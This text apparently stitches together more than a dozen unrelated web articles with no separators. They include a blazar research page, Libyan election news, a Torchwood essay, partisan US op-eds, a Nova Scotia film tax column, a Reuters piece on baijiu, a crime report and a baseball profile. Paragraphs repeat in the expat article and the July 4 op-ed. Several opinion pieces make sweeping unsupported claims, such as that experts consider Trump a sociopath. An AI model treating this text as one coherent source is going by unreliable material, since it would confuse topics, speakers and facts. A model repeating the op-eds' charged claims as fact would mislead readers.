Here are 3 freeze-frames from the movie showing the shock in different parts of the jet as it moves away from the black hole. The first represents the shock wave while it is still in the acceleration zone where the magnetic field is coiled. The 2nd shows the shock as it exits this region, just after it reaches its brightest point. The last frame shows the moving shock passing through the stationary "X" shock that we call the "core."
*COSMOVISION is a project to produce scientific and didactic visualization of astrophysical objects and processes by way of 3D-animations. Using methods similar to those applied in the production of documentaries and feature films, they put emphasis in scientific and didactic rigor. They can combine physical computer-simulations with conceptual animations to present scientific results in a wholy new fashion. The research group is based in Ensenada, Mexico.
Cosmovision's motto is: "If we can't go to the stars, we bring them to your home."
COSMOVISION web site: http://www.cosmovision.com.mx
SONG!! Alan Marscher (stage name: Cosmos II) has composed and recorded a song about blazars called "Superluminal Lover." You can download the MP3 file and view the lyrics on the Superluminal Lover web page. More science songs by Cosmos II can be found on Marscher's songs web page.
Newer Data
We included BL Lac in our monitoring program starting in 2005. (We also monitored it less intensively in 1999-2000.) The light curve from the more recent period is shown below. (We need to collect optical data from our collaborators for the period after early 2007). We note that there are signs that flares appear in pairs, as in late 2005. Notice the very high X-ray point in late 2006, which coincided with the peak of an optical flare. The X-ray spectrum steepened significantly, which we interpret as a sign that synchrotron radiation becomes dominant over inverse Compton scattering as the cause of the X-ray emission. When this happens, the variations in brightness are often too rapid for us to follow well with our 3-times-per-week monitoring with RXTE. We will fill in the optical light curve and marking the "ejections" of superluminal radio knots seen with the VLBA (the upward arrows in the top panel) when the data become available.
Return to main research page
SAIF AL-ISLAM GADDAFI, son of Libyan leader Muammar Gaddafi and chairman of the Al Qaddafi International Foundation for Charity and Development, addresses students and staff at the American University in Cairo, in 2010 - REUTERS/AMR ABDALLAH DALSH
CAIRO – 17 December 2017: “Saif al-Islam Gaddafi, the son of the former Libyan president, enjoys the support of major tribes in Libya so he can run for the upcoming presidential elections due in 2018,” said Libyan Tribal Chief and spokesperson of the Gaddafi family, Basem al-Hashimi al-Soul told Egypt Today.“Saif al-Islam will run for the upcoming presidential elections which may take place in mid-2018,” al-Soul revealed to Egypt Today.Al-Soul told Egypt Today that Saif al-Islam has prepared his platform which he intends to declare soon. “The platform includes some procedures that Saif al-Islam hopes the United Nations would adopt to help Libya move from the incumbent transitional period to stability.”“Saif al-Islam plans to impose more security and stability in accordance with the Libyan geography and in coordination with all Libyan factions,” al-Soul manifested.Presidential elections in Libya may be held in mid-2018, the Libyan Government of National Accord's (GNA) Foreign Minister Mohamed Siala said Wednesday at the Valdai Club panel discussion in Russia. “We believe that presidential elections will be held in the middle of 2018,” Siala told foreign reporters.The foreign ministers of Egypt, Tunisia and Algeria have convened in Tunisia on Saturday to resume discussions over the security and political developments of Libya. Libya has become the largest security threat facing the Egyptian state, along with Tunisia and Algeria. The frequent failures of international reconciliation attempts and the fall of weapons into the hands of different militant groups forced Egypt to play a major role in solving the Libyan crises.Last week, President Abdel Fatah al-Sisi met with Libya's Chairman of the Presidential Council Fayez al-Sarraj and discussed political accords necessary to preserve Libya's unity and integrity.The meeting was attended by high-profile leaders from both sides, namely Libyan Foreign Minister Mohamed al-Taher, Libyan Minister of Finance Osama Hammad, Egyptian Foreign Minister Sameh Shoukry, Egyptian Minister of Finance Amr el-Garhy, Egypt's Intelligence Chief Khalid Fawzy and the Egyptian ambassador to Libya.Egypt's presidential spokesperson, Bassam Rady, said that Egypt welcomes the frequent meetings of the Libyan military commanders in Cairo; he also stressed that Egypt confronts foreign proposals aimed at intervening in Libya's domestic affairs.“Sisi and Sarraj tackled means of cooperation between the two countries in combating terrorism and boosting international endeavors for developing a comprehensive strategy against terrorism,” the statement read.In December 2015, 22 Libyan parliamentarians signed the Skhirat Agreement in Morocco, to end the civil war which erupted in Libya in 2014. The Skhirat Agreement was put into practice on April 6, 2016.The Government of National Accord, led by Fayez al-Sarraj was the first concrete outcome from the Skhirat Agreement. The first meeting of the cabinet of the Government of National Accord took place on January 2, 2016 in Tunisia.
The ninth episode of the first season of Torchwood, “Invisible Eugene,” is full of poignant double entendres and symbolism. The title itself reflects the life of an individual who, after failing in a math competition, was abandoned by his father and ignored by most people as he followed a trajectory that involved entering into possession of an alien eye and waiting around for something interesting to happen – presumably when the alien returned to claim it.
As his father leaves him and his family, Eugene says about the eye, “If you leave something important behind, you come back for it, right?” The meaning in relation to his father's departure is hard to miss.
The episode thus highlights the potential for interest in aliens and other geeky pursuits to serve as distractions and sources of comfort for the lonely and socially maladjusted. It mentions people visiting the local video store in the hope of being “transported away,” and what a shame it is when a brief human life span is spent waiting around in the hope that something interesting will happen.
But in addition to its point about the invisible nerdy people blending into the background in schools and at work, dreaming of amazing things but not making amazing things actually happen in their lives, this episode also enters another domain that is surprisingly prevalent in science fiction.
The soul.
Eugene hangs around as an invisible presence after he is killed in a car accident – because he swallowed the alien eye. But the possibility of the personality of an individual surviving their death, even if only with the help of alien technology, is still remarkably prominent in science fiction, given that it is an idea with little or no basis in anything genuinely scientific. Whether on thinks of Fringe or Lost, or Doctor Who, Star Trek or Star Wars or Battlestar Galactica, all seem to leave room for the possibility of transcending death, of surviving, of the immortality of the soul. Even Torchwood, in which Capt. Jack Harkness, who is somewhat unique in having died, says in the very next episode, “Out of Time,” that “You don't get reunited. It just goes black.” The very fact that Suzie and Jack and various others could return from the dead requires that something of them survive.
Many fans of science fiction would dismiss traditional religious teachings about an afterlife. Torchwood seems to want to explicitly deny that there is an afterlife. How then are we to account for the prevalence of the soul in sci-fi, even on Torchwood?
Perhaps it is because these aren't really two themes in the episode “Invisible Eugene” after all, but only one: even a relatively “invisible” life which never achieves “greatness” is still something we recognize as so valuable, unique, and precious, that it is hard even for materialists to accept that it simply vanishes, that it is fully and truly ephemeral.
As strange as it may seem, the Electoral College does not have to elect Donald Trump president on December 19 when the electors cast their ballots. The U.S. Constitution does not actually require them to vote for the candidate who won the popular vote in their respective states.
In fact, when the Constitution was being drafted, Alexander Hamilton explained that the provision giving the Electoral College discretion in its selection of the president was an important precaution guarding against an ill-informed public making an unwise choice. A very good argument can be made that the people's election of Donald Trump meets this test for the electors to substitute their judgment for that of the voters. Here's why:
1. Experts believe that Trump is a sociopath. (See goo.gl/FXNJNF.) He is a person who lacks regard for the moral or legal standards of our culture and exhibits the following traits: a disregard for the feelings of others, a lack of remorse or shame, manipulative behavior, unchecked egocentricity, an inability to take criticism, and a tendency to lie in order to achieve his goals. Trump has displayed all of these characteristics on numerous occasions during the election campaign. Is such a man a wise choice to lead our country?
2. Trump's candidacy was supported by a foreign government, Russia, our adversary. This was confirmed by American intelligence services. In fact, Russian Deputy Foreign Minister Sergei Ryabkov admitted communicating with many of Trump's closest associates during the campaign. (See goo.gl/Axm8Wx.) At the same time, Trump has refused many American intelligence briefings. Is someone who would allow a foreign adversary to meddle in our elections while rejecting American intelligence trustworthy to be president?
3. Trump still refuses to release his tax returns. The American people have no way of knowing what financial relationships Trump has with Russia, other foreign adversaries, or anyone that might create a conflict of interest. Do we want a president who will not be open and honest with the American people about his relations with our adversaries?
4. Trump has shown a number of signs that he intends to use the presidency for his personal gain. Among them is his refusal to put his private holdings in a blind trust controlled by an independent executor. When he met with Indian executives recently, Trump discussed potential private business deals with them. And, his infrastructure proposal is a boondoggle that will put the control of our roads and bridges in the hands of his billionaire friends.
Even more troubling is the fact that Trump's foreign holdings have the potential for placing him in a dangerous conflict of interest between his financial concerns and the safety of American property and lives. For instance, what is to stop an authoritarian country like Iran or Turkey from threatening Trump's business interests unless he complies with its wishes, or, on the other hand, offering him special deals, on the condition Trump agrees to certain demands inimical to America's interests?
This may just be the tip of a very risky iceberg if Trump becomes our president. The electors must think long and hard before casting their votes for him. But, what is their alternative? While Hillary Clinton would make a much better president than Trump for a large majority of Americans, the truth is many Republican electors despise Clinton and would never change their vote and support her. Plus, the voters who sent them to the Electoral College would be outraged if their electors chose Clinton over Trump. That just would probably result in tremendous civil unrest.
Fortunately, there is another choice, Bernie Sanders. In their combined wisdom, the electors could turn to Sen. Sanders. There is nothing in the Constitution that forbids them from doing this. A good number of the people who voted for Trump have a favorable opinion of Sanders. In fact, Sanders was the only one of the three major candidates who had an overall positive rating with the general public. Electing Sanders could save the country from an egocentric sociopath, on the one hand, and very disruptive civil disorder, on the other.
You can help our country move in a more positive direction. Contact your state's electors and urge them to elect Bernie Sanders for president. And, tell everyone you know to do the same.
Go to www.breakingbigmoneysgrip.com for how we can work together to revive our democracy.
The largest American expatriate community in the world resides in Mexico. Estimated to be around one million, it boasts greater raw voting power than that of six US States and the District of Columbia. Life on the other side of the border also informs the way these potential voters see key parts of the political debate, such as Donald Trump's promise to build an impenetrable frontier wall.
"We're not as plugged in as people in the States, but we're definitely watching," he said of American expats like himself. "I mean, mostly in horror."
He seems to be at perfect ease — until he is asked about the US elections.
Sporting a slicked-back ponytail, hiking boots, and blue jeans, 38-year-old New Orleans native Sean Reagan lounges on a bench in San Miguel de Allende, the colonial Mexican town where he lives.
Read more
Sporting a slicked-back ponytail, hiking boots, and blue jeans, 38-year-old New Orleans native Sean Reagan lounges on a bench in San Miguel de Allende, the colonial Mexican town where he lives.
He seems to be at perfect ease — until he is asked about the US elections.
"We're not as plugged in as people in the States, but we're definitely watching," he said of American expats like himself. "I mean, mostly in horror."
The largest American expatriate community in the world resides in Mexico. Estimated to be around one million, it boasts greater raw voting power than that of six US States and the District of Columbia. Life on the other side of the border also informs the way these potential voters see key parts of the political debate, such as Donald Trump's promise to build an impenetrable frontier wall.
Related: Hey, Donald Trump, More Mexicans Are Leaving the US Than Entering
"It always sounded absurd to me, but it puts it in an even more absurd light, coming from here [Mexico]," said Elizabeth Auritt, a recent college graduate who is now working for an economic development organization in Mexico City. "Of course immigration is a good thing and, as an expat in another country, you see that more clearly."
It is easy to find critics of Trump's rhetoric among Americans living in Mexico, given his nasty comments about Mexican immigrants that began with the speech that launched his campaign in which he called them "rapists" and "criminals." But there are also those who sympathize with the leader of the Republican pack, even if sometimes they wish he would tone it down a bit.
'Trump makes perfect sense to me... But he's just a bully.'
"Trump makes perfect sense to me" said Karen Boda, a California native and lifelong Republican who now works as a real estate agent in Mexico City. "But he's just a bully. I don't think he's the image I want for the Republicans because he's not a diplomat."
Boda said her instinctual support for Trump owes most to a sense that he would be a strong leader in the current context of global insecurity. It is a sense, she said, that was hammered home by recent terrorist attacks around the globe and by living in a place she believes could also be hit.
"We don't know where they're going to strike next and Mexico could be an easy target," said Boda, who added that she tends not to reveal her conservative political views to her Mexican clients for fear of scaring them off.
Larry Rubin, a dual US and Mexican citizen who leads the Mexican chapter of Republicans Overseas, said he believes security concerns should encourage all Americans living in Mexico to lean Republican.
Related: White Students Keep Using Anti-Latino 'Trump' Chants at High School Basketball Games
He also argues that Mexicans in general share a culture with the Republican party that values religion, smaller government, lower taxes, and expanded international trade. And, he claims, most expats move abroad for business and so do not appreciate the protectionism associated with the Democrats.
"The American community in Mexico want more jobs from US companies here," Rubin said.
Yet the head of Republicans abroad admitted there was significant "angst" within the community about Trump and more sympathy for Marco Rubio and Jeb Bush (when he was still in the race) thanks to their ties to Latino heritage.
"He [Trump] is seen as someone who would not be able to work well with the Mexican government, and that is of interest to the Republican community here," Rubin said. "We are constantly saying to other Americans that the Republican Party is not defined by Donald Trump."
The Democrats also have their own image problem thanks to the hike in the number of undocumented Mexican immigrants deported on President Barack Obama's watch. Obama is even known to some activists here as the "deporter in chief."
'We're definitely watching... I mean, mostly in horror'
Even so, Vice Chair of the Mexican Chapter of Democrats Abroad, Marc Berube, claimed his party is more inclusive.
"What engaged me with the party was this idea of wanting to help everyone," he said. "I am a Democrat because the party cares about everyone…. people who need food stamps, women's rights, LGBT people."
Berube, who spearheads events for the Democratic community around Mexico from his base in the colonial town of San Miguel de Allende, lauded his party's candidates for avoiding the "distracting name-calling" of the Republicans.
'Bernie's cool, but he's a bit out there. It'd be nice to have some other candidates'
He said he personally errs towards former secretary Clinton, but conceded that this may reflect his age. "Perhaps it's a generational thing," Berube said. "I know that many of the younger people really like Bernie Sanders."
For Sean Reagan, the New Orleans native, the choice is so difficult that he wishes he had another option.
"I'm not wild about Hillary…even though she's more to my liking than most of the Republicans, she's still an insider. She's status quo," he said. "Bernie's cool, but he's a bit out there. It'd be nice to have some other candidates in between that I could get behind."
Related: Clinton, Sanders Get Testy in Flint, Michigan, Ahead of Major Primary Contest on Tuesday
But, as so often happens in conversations about the US elections in Mexico, it can all seem to come back to Donald Trump.
"Imagine if he did take power, with this whole idea of building a wall between the United States and Mexico," Reagan added. "We'd be on the other end of that. We'd be on the other side of the wall."
Follow Eduardo Gonzalez and David Olvera Sanchez on Twitter: @ed_gonzalez6 and @jdavid_olvera
Stephen McNeil's political instinct has deserted him on the film tax credit.
When people talked about Nova Scotia's financial difficulties, nobody said, 'You know what the problem is? It's the film industry!'
McNeil is as wrong as he could be but he doesn't see it — and my bet is the people around him don't know how to tell him.
This is real bull-in-a-china-shop stuff. McNeil has charged into an industry he plainly doesn't understand, turned around a few times and then told the shopkeepers that we couldn't afford all that broken china anyway.
The alternative proposed by the premier might make sense on a Treasury Board flip chart, but it is nonsense in the real world. It won't work and it's not the industry's job to fix it. If the government's proposal goes through, the film industry in Nova Scotia is as good as dead.
Real people, real jobs
Even if you buy the government's narrow financial analysis — the same analysis the Liberals in opposition rejected out of hand on the Yarmouth ferry — that doesn't explain the way it's being done.
The finance minister did a round of pre-budget consultations, but these changes never came up. The government commissioned a tax review, but the recommendations in that review were far gentler.
If a transition to a different system is warranted, it should be done slowly, carefully and thoughtfully. Not like this.
Film industry workers are real people with real jobs. They're all over the province. There's no us and them. They are us.
Now those film industry workers are suffering sleepless nights. Their future is in doubt. Their stress is through the roof. Should we stay? Can we stay? What's left for us? The suddenness of the change is more than breathtaking. It's cruel.
Stephen McNeil is supposed to get all this. He's a politician with considerable people skills. If he didn't understand regular, middle-class folks with mortgages and a few dreams, he wouldn't be where he is.
Instead, on this issue he's coming across as distant, callous and stubborn.
That's not how he sees himself, though. In the film of his mind's eye, he's courageous. He's making the tough decisions that previous governments weren't prepared to make.
So who, inside the government or the Liberal party, is going to tell the premier he's wrong?
The power of a premier
Part of our sick political culture is the inordinate power accorded to a premier. A premier with a majority in the legislature controls everything. Everybody tiptoes around him.
If the Liberals adhere to the political culture, here's what will happen:
McNeil's cabinet ministers owe their job to him and it's the best job they've ever had. They won't tell him he's wrong.
His backbenchers are all rookies, too unsure of themselves, too scared of what will happen if they step out of line. Besides, they'd love to be in cabinet some day. They won't tell him he's wrong.
The federal Liberals hope to win more seats in Nova Scotia in the October election. They'll worry it's slipping away. They'll suggest to him that he back off, but will do it so gently that he might not get the message.
Meanwhile, the premier's closest advisors will protect him at all costs. They, too, owe their jobs to him.
In modern politics, a premier's image is so important. He is the face and voice of the government. The Liberals would rather kill the film industry than admit their premier made a mistake.
Most generous tax credit
The most generous tax credit in Nova Scotia isn't the film tax credit. It's the political donation tax credit, which tops out at 75 per cent.
In the 2013 provincial election, only 7,710 Nova Scotians voted for Stephen McNeil. That's the number of people who voted for him in his home constituency of Annapolis. He is our premier because he is the leader of a political party — a party that owes its continued existence to the most generous tax credit of all.
We could all use less posturing and more leadership.
The Ivany Report's first recommendation was for a different kind of politics. So far, we haven't seen it.
Who will rise above our broken political culture? Who will lead?
Ever since the awful shooting in Newtown, CT in December 2012, mental illness has been front and center on the mind of anyone thinking about public safety in America. I am worried about what this means for many people successfully living with mental illness.
Ever since the awful shooting in Newtown, CT in December 2012, mental illness has been front and center on the mind of anyone thinking about public safety in America. I am worried about what this means for many people successfully living with mental illness.
Prior to the shooting at Sandy Hook, we have had various groups afflicted with mental illness. To name a few:
- We have children who are subjected to various forms of psychological, physical and sexual abuse and they will live with the trauma from that abuse everyday for the rest of their lives often in the form of mental illness.
- We have children living with ADHD, CD, ODD, depression, OTSD, bipolar disorder and more.
- We have veterans who suffer from PTSD and TBI, which can cause mental abnormalities and present new psychological functioning problems.
- We have many senior citizens who are suffering from Alzheimer's disease and other forms of dementia.
- We have adults living with depression, bipolar disorder, alcoholism and addictions to other substances.
The prevalence of mental illness in our society is staggering. The National Institute of Mental Illness estimates that in the past year 26 percent of the population have suffered from a mental illness in one form or another, and about 45 percent have suffered from mental illness at some point in their life. With this in mind, everyone is affected by mental illness either personally or someone very close to them, i.e. a family member, friend or work colleague.
However, I question the cursory focus on mental illness we see from many people opposed to further gun restrictions. This is not a call to take away the rights of people who enjoy a legal culture of shooting. As a state representative, I have gladly worked with several constituents obtain their gun permits; I don't have a problem with law abiding people owning guns. I have a problem with anyone demonizing a group of people already stigmatized by society.
Our jails and prisons are filled with people afflicted with mental illness but people afflicted with a mental illness are more likely to become a victim of violence than a perpetrator of violence. We need to stop the fear mongering.
Another concern I have with focusing on mental illness since the shooting in Newtown is not just that I question a superficial interest of the people suddenly talking about mental illness, but their level of understanding. Understanding the nuances of mental illness takes time. It takes dedicated study and perhaps most importantly, it requires compassion. The world doesn't need any more armchair psychologists.
Too often I hear pundits, politicians and the public alike say the phrase "the mentally ill." This single phrase, to me, not only symbolizes a lack of understanding about mental illness, but may well be a form of discrimination by some people.
The so-called mentally ill are people, first, who happen to be afflicted with an illness not of their choosing. They are people who may be living successfully or unsuccessfully with a condition. They are our brothers, our sisters, family members, co-workers, our friends and the strangers walking by on the street.
We need to refer to these so-called mentally ill as people afflicted with a mental illness or just people. To vilify and talk about people afflicted with mental illness in a way that implies we should be worried about them for our own sake. But this misses the point that we are not helping them for their sake.
Considering that nearly 1 in 2 people is afflicted with a mental illness at some point in their life, remember that there is a good chance the so-called mentally ill could be you one day. If it is, how do you want people to refer to you? How do you want people to think about you? And how do you want society to treat you?
State Rep. Paul Heroux, D-Attleboro, is a member of the Joint Committee Mental Health & Substance Abuse. Paul can be reached at paulheroux.mpa@gmail.com.
Conservative Student Group Commits 'Act of Violence' for Defending Christian Values, Refusing to Participate in LGBT Sensitivity Training
Email Print Whatsapp Menu Whatsapp Google Reddit Digg Stumbleupon Linkedin
A conservative student group at The George Washington University faces punishment, including the loss of its funding, for refusing to engage in LGBT sensitivity training on campus. The students are now being condemned and attacked on campus by those who claim they're committing an "act of violence" for standing up for their members' individual rights and Judeo-Christian values.
The Young America's Foundation chapter at the Washington, D.C.-based academic institute has refused to participate in LGBT sensitivity training recently made as a requirement.
Amanda Robbins, vice president of GW YAF, told The Christian Post that their objection to the training "stems not only from many of our members' Judeo-Christian values, but also from our organization's commitment to defending the individual rights of every student on campus."
"We firmly believe that there should be no such preconditions for any student organization to be able to operate freely on campus," said Robbins.
"GW YAF welcomes any individual to attend our meetings and our events on campus; our organization has always behaved in a respectful manner."
The issue derives from a few bills that GW Student Association, the university's student government, passed requiring the training.
"The student association does not need to dictate this to us or to other students," Robbins told CP regarding the sensitivity training.
"In fact, the national YAF organization has existed for over 50 years, and in this time, it has consistently treated with respect individuals of all orientations."
Last month, the GW Student Association passed a bill that would create sensitivity training for student leaders regarding LGBT issues, according to Victoria Sheridan of the GW Hatchet.
"Trainings, which would be led by staff at the Multicultural Student Services and LGBT Resource centers, would teach professors about gender identities and using proper gender pronouns," reported Sheridan.
"Student organization presidents and treasurers would also be required to undergo similar trainings."
GW YAF's stance has been criticized by multiple student groups, including the university's LGBT group, Allied in Pride.
"The Young America's Foundation is a political organization, not a religious one, so they cannot seek a religious exemption," argued members of Allied in Pride on their Facebook page.
"And their refusal to use preferred gender pronouns should be considered an act of violence and a violation of the non-discrimination clause required in all GW student organizations' constitutions."
Alex Pollock, chairman of the GW College Republicans, explained to the campus publication GW Hatchet that the training "should be mandatory from a sensitivity perspective."
"Regardless of your views on LGBT people, LGBT people exist. … The intent is not to belittle political or religious organizations," said Pollock. "The purpose of this bill is to make student organization leaders aware that we have a diverse student body and make people feel included."
Regarding the possible result of the controversy, Robbins of GW YAF told CP about the best and worst case scenarios.
"In the best-case scenario, the university recognizes the constitutionally-protected free speech rights of every student on campus and refuses to support the student association's legislation and juvenile attempts to silence us on campus," said Robbins.
"The worst-case scenario is that the university supports this mandatory training and removes our funding and ability to organize on campus for refusing to participate."
The Shattered Empire update releases April 27, and brings three new pieces of multiplayer content, in the form of two new endgame dungeons, and a brand new PvP game mode.
Whirlwind Valley
This is a brand new 6v6 PvP mode that challenges teams of players to capture and maintain control over a number of objectives to earn points. The first team to 1800 points, or the team with the most points when the timer runs out, wins. Your team can earn points by holding objectives, defeating enemy players, and for killstreaks. After a match you'll earn Battle Points, which you can then use to purchase rewards from new Battlefield Traders that have a wide range of items for sale including upgrade materials, Soul Shields, and costumes.
Whirlwind Valley is entered through the F8 (Cross Server) menu, and unlike the Arena, player gear is not equalized. This means that your progression in the game content—and quality of your gear—will play an integral role, but good strategy and teamwork will ultimately decide who wins.
Sogun's Lament
Explore a ruined palace compound far in the frozen north of the Silverfrost Mountains. The tragic tale of Prince Sogun is told throughout your adventure here, and you may finally be able to help put his tortured spirit to rest. You must fight your way through the palace's defenses, including a small army of elite troops and summoned monsters, before finally facing off with Asura—the palace's final boss.
Sogun's Lament is the most difficult piece of new group content, offering a new pinnacle of difficult content for coordinated groups of players to attempt to tackle. Available in 4- and 6-member difficulty, the drops from Sogun's Lament allow for the continued progression for weapons and accessories.
Cold Storage
Cold Storage is a new Heroic group dungeon that can be completed once per day, unless a Cold Storage Reset is purchased from the Hongmoon Store. It offers consistently sought-after rewards, and most players will want to complete this fairly low-difficulty dungeon every day to assist with their progression.
The second boss, Kaari Lord, is optional, and can only be spawned by collecting three colored orbs (which are tradable) from the first boss Winter Mane. By defeating bosses and completing the dungeon you'll earn rewards like experience, Frozen Stingers, and Freezing Orbs—which can be used to purchase Frozen weapons, Hongmoon Skillbooks, and clan crafting recipes.
Harvest Moon: Skytree Village will launch for 3DS in North America on November 8, publisher Natsume announced.
In Europe, the game is due out via publisher Rising Star Games in spring 2017.
Natsume also detailed the game's bachelorettes:
Jeanne
“I… I…I'm Jeanne! I'm…studying to be an herbal doctor!”
A shy girl training to become an herbal doctor. While she is extremely intelligent and excellent at her job, she can also be a bit goofy, which makes her an endearing, fun-loving gal!
Elise
“Enchanted to meet you! My name is Elise!”
The daughter of Bastian, the Chef and owner of the restaurant and Inn in town. Elise is an aspiring apprentice chef. A bright and cheerful girl with a certain je ne sais quoi about her, her dream is to become a great chef just like her father!
Melanie
“So, whatever-your-name-is, am I, like, even in the right PLACE? Is THIS the Harvest Goddess' land?”
The granddaughter of Gus, the blacksmith in town. Melanie is a successful interior and apparel designer, running her own shop; Melanie's Designs. She's a strong-willed city girl who came to Skytree Village because she heard of its legendary beauty.
CHENGDU, China (Reuters) - Chinese baijiu, a flammable, pungent white liquor averaging a 110-proof wallop, is the world's most consumed form of liquor thanks to its popularity in China, but for the first time distillers are looking to develop export markets.
A customer walks past a glass case displaying Maotai liquors, a form of baijiu, with different price tags at a supermarket in Shenyang, Liaoning province, in this August 8, 2012 file photo. Chinese baijiu, a flammable, pungent white liquor averaging a 110-proof wallop, is the world's most consumed form of liquor thanks to its popularity in China, but for the first time distillers are looking to develop export markets.REUTERS/Stringer/Files
According to data from International Wine & Spirit Research, Chinese people drank over 11 billion liters of baijiu in 2012; the spirit, distilled from sorghum, wheat or rice, accounted for more than one-third of all spirits consumed in the world.
But as a new generation of Chinese drinkers discovers the imported spirits that were unavailable to their parents, baijiu risks losing that market share unless it creates new markets overseas.
“Baijiu hasn't been marketed to the West yet but I think it can be,” said James Rice, managing director of Sichuan Swellfun Co Ltd, a baijiu maker in Chengdu, western China, in which London-based beverage multinational Diageo has taken a sizeable stake.
“People are interested in China and here's a piece of Chinese culture that can go right to your dinner table.”
The opportunity has also attracted small entrepreneurs like David Zhou, who founded Washington-based Everest Distillery to import a Chinese baijiu and rebrand it for sale locally.
“We really want to go for mainstream U.S. consumers and we do believe they can accept it.”
But Rice, and other distillers, have to deal with a major challenge: baijiu tends to make a terrible first impression.
“I thought it tasted like paint-thinner and felt like a liquid lobotomy,” said Michael Pareles, manager at the U.S. Meat Export Federation in Beijing. “However, like many other things in China, I eventually grew to like it.”
Torsten Stocker, head of Greater China consumer practice at Monitor Group in Hong Kong, was skeptical about prospects for overseas expansion.
But he suggested the liquor could be better distributed to the swelling overseas Chinese community, which now depends on duty-free stores in airports to stay stocked.
Baijiu's punch makes it a tough sell in Western bar culture where people drink on an empty stomach. So does its fuel-like odor and its aftertaste. But the history of alcoholic beverages shows that nearly any taste can be acquired.
“Tequila has a very unusual flavor compared to more popular spirits,” said Derek Sandhaus, industry consultant and author of a forthcoming book on baijiu appreciation.
“But through clever marketing, good cocktails, and good management, it's earned a place on the bar shelf. I see no reason why the world's most popular spirit can't do the same.”
MAKING THE ADJUSTMENT
But an adjustment is still probably necessary.
Matt Trusch, a former China resident, founded a distillery called Byejoe USA that imports baijiu base from China, then re-filters it to make it more drinkable.
“We've made it much more palatable to American tastes.”
Vinn Distilleries in Portland, Oregon, founded by a family of ethnic Chinese immigrants from Vietnam, is reproducing a generation-old baijiu recipe, and Vinn president Michelle Ly has marketed it - in very small volumes - to non-Chinese consumers.
Slideshow (5 Images)
Curiously enough, she said a group of investors had approached her with an idea to export her U.S.-made baijiu back to China, advertising it as a product of high quality control - an issue domestic baijiu brands have struggled with.
Baijiu expert Sandhaus thinks the best avenue for developing drinkers overseas is to follow the model of Japanese sake and market baijiu as the alcohol to drink with Chinese food. But he added that there is no need for distillers to rush.
“It will still be a very long time before baijiu stops being a very lucrative business in China.”
Independence Day is America's birthday. This July 4 will be the first with Donald Trump as president of the United States. The country is in distress. Donald Trump and the Republican Party are largely responsible.
They are trying to impose a “health care” bill that can reasonably be called They are trying to impose a “health care” bill that can reasonably be called a crime against humanity . It is likely to kill tens of thousands of Americans each year and leave millions more sick, suffering, miserable, homeless, in pain or in financial ruin.
Trump and his 2016 presidential campaign are under federal investigation for conspiring with a foreign power to undermine American democracy (and thus disenfranchise millions of Americans) by stealing the 2016 election from Hillary Clinton. Whatever the investigation may reveal, this is an unprecedented event in American history.
The social safety net and the very idea of the commons have been targeted for destruction by Donald Trump and the Republican Party. Their Malthusian politics have no use for the poor, the weak, the elderly and any other groups deemed to be “useless eaters.”
Ultimately, Donald Trump has debased the office of the presidency. The Republican Party and the corporate news media enable him. To a large extent, the United States has been made a mockery before the world in less than six months of the Trump presidency.
The United States is a country that is truly in distress. I offer the following proposal. On this first Independence Day under President Trump, people of conscience and true patriots should fly the American flag upside down, as a collective signal of our national distress.
ELLWOOD CITY, Pa. (KDKA/AP) – A woman and her adult son have been ordered to stand trial on charges they fatally beat the woman's husband behind a western Pennsylvania grocery store.
State police testified Wednesday that 40-year-old Lisa Jones-Orock and her 22-year-old son, Zachary Jones, plotted to lure 57-year-old Gerald Lee Orock Jr. to the market in Ellwood City the night of Dec. 7.
Police say both suspects gave statements, though Jones-Orock tried to deny her son was involved. But police say Zachary Jones told them he beat and kicked Orock until he was bloody and motionless, then posted on Facebook that Orock beat his mother “more times than she deserved.”
The weapon used was allegedly a wooden club.
The couple had a history of domestic dispute incidents.
In March, Lisa was charged after allegedly trying to cut off Gerald's penis with a box cutter in Ellwood City.
Lisa initially told police Gerald attacked her with a knife. As a result, he was briefly taken into custody.
After being taken to the New Castle Police Department, he told police she tried to cut his penis off with a box cutter.
His pants were cut in the crotch area. He also had cuts to his arms and hands. Police determined the wounds were defensive in nature.
Join The Conversation On The KDKA Facebook Page
Stay Up To Date, Follow KDKA On Twitter
(TM and © Copyright 2015 CBS Radio Inc. and its relevant subsidiaries. CBS RADIO and EYE Logo TM and Copyright 2015 CBS Broadcasting Inc. Used under license. All Rights Reserved. This material may not be published, broadcast, rewritten, or redistributed. The Associated Press contributed to this report.)
Wilson Ramos, known more for his offense than his defense, defended better than he hit in 2015. (Morry Gash/AP)
Dusty Baker started calling Wilson Ramos “El General” (pronounced “Hen-er-al”) shortly after they met. Ramos doesn't know why. Catchers are often referred to as field generals, the ones who orchestrate the action by calling pitches, the only ones who see the whole field during every pitch. As the starting catcher for the Washington Nationals, Ramos's job has been to lead one of the best pitching staffs in baseball for the last few seasons — their general, so to speak. The name, therefore, makes some sense.
But is Ramos the man to lead the Nationals' staff long-term? If so, is El General an offense-first catcher? An improved defensive presence?
The idea since Ramos became an everyday big league catcher in 2011 was that if he could stay healthy, he would hit his defense into irrelevance. Behemoth power like his — he nearly hit a ball over all the seats in left field at Nationals Park late last season — does not often settle behind the plate, so Ramos looked like that rare and coveted combination of a catcher with middle-of-the-order pop. If he could stay healthy, which he couldn't from 2012 to 2014, he would hit.
Before the 2015 season, Ramos dedicated himself to building his body to withstand the demands of his position, and stayed healthier as a result. He played 128 games, 15 more than he had played in a season, but still the fewest of any catcher with enough at-bats to qualify for a title — and he did not hit. He struck out more often than in any other year of his career. He seemed a tick behind good fastballs, peppering the middle decks to the first base side of home plate with foul balls. Ramos has a .287 career average against left-handed pitching. He hit .233 against lefties in 2015.
“I know offensive for catchers not that important. It's more important [to play good] defense,” Ramos said. “But I like to help my team with my bat, too, so this offseason I'm working hard with that, to try to get better approach at home plate and try to concentrate more and put the ball in play. This year, I got a lot of strikeouts, so that not help, but concentrate right now on all that, so hopefully next season will be better than this season.”
Measured by the not-always-reliable baseball eye test, Ramos looks like an offense-first catcher. His unique blocking style and trouble handling throws from the outfield — the most visible and immediately consequential plays a catcher must make, and therefore the most memorable — combine with sometimes monstrous batting practice displays to label him an offensive catcher, all the way.
But last season, when he struggled at the plate, his numbers improved so dramatically behind it that he was nominated one of three finalists for the National League Gold Glove. He allowed three passed balls, second fewest among qualified catchers. Pitchers threw 26 wild pitches in the 1078 1/3 innings Ramos caught. Only Giants catcher Buster Posey allowed fewer, in 170 fewer innings. Ramos and Posey led major league catchers with nine Defensive Runs Saved. Ramos threw out 44 percent of attempting basestealers, second-most in the majors.
